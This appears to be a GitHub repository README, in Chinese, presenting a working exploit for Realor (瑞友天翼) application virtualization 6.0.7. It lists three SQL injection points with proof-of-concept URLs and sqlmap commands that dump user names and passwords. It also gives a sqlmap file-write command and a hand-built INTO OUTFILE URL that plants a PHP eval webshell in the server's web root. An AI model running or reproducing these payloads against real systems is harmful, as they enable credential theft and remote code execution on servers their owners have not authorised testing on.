hkxueqi / realor-sql-Injection-exp

瑞友天翼sql-rce漏洞,远程代码执行-RCE-sql注入,realor-sql-Injection

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

realor-sql-Injection-exp

瑞友天翼应用虚拟化-远程代码执行/sql注入,realor-sql-Injection

前言

共有三个注入点,其实看了源码发现只要没加过滤函数的基本都有注入;即便加了过滤函数(过滤的很少),能否bypass后续也可以研究

POC

poc1:

http://url/AgentBoard.XGI?user='||'1&cmd=UserLogin

poc2:

/ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_1'__pwd_1__serverIdStr_1&sign=98917d27eda97794c471d1692a019182

poc3: GetBSAppUrl

EXP

exp1:

sqlmap -u 'http://url/AgentBoard.XGI?user='||'1' -D CASSystemDS -T CUser -C name,pwd --dump
sqlmap -u "" --file-write "/root/shell/shell-php/biaozun.php" --file-dest "C:\RealFriend\Rap Server\WebRoot\3.php"
#或者手动
http://172.16.1.200:8081/AgentBoard.XGI?user=%27%7C%7C%271%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27C%3A%2FRealFriend%2FRap%20Server%2FWebRoot%2F3.php%27%20LINES%20TERMINATED%20BY%200x3c3f70687020406576616c28245f504f53545b22636d64225d293f3e--%20-&cmd=UserLogin
#需要修改绝对路径,内容是16进制,<?php @eval($_POST["cmd"])?>

上述用绝对路径不是最通用写shell方法,不细说了。

漏洞细节

复现环境:版本:6.0.7 查看版本:

/About.XGI
/CASMain.XGI?cmd=About

zend52解密xgi:http://dezend.qiling.org/free/ Pasted image 20230417154219

漏洞点: Pasted image 20230417154148

登陆处是有过滤的,这里没有用过滤函数造成注入。 image

getshell直接sqlmap或者手动

About

瑞友天翼sql-rce漏洞,远程代码执行-RCE-sql注入,realor-sql-Injection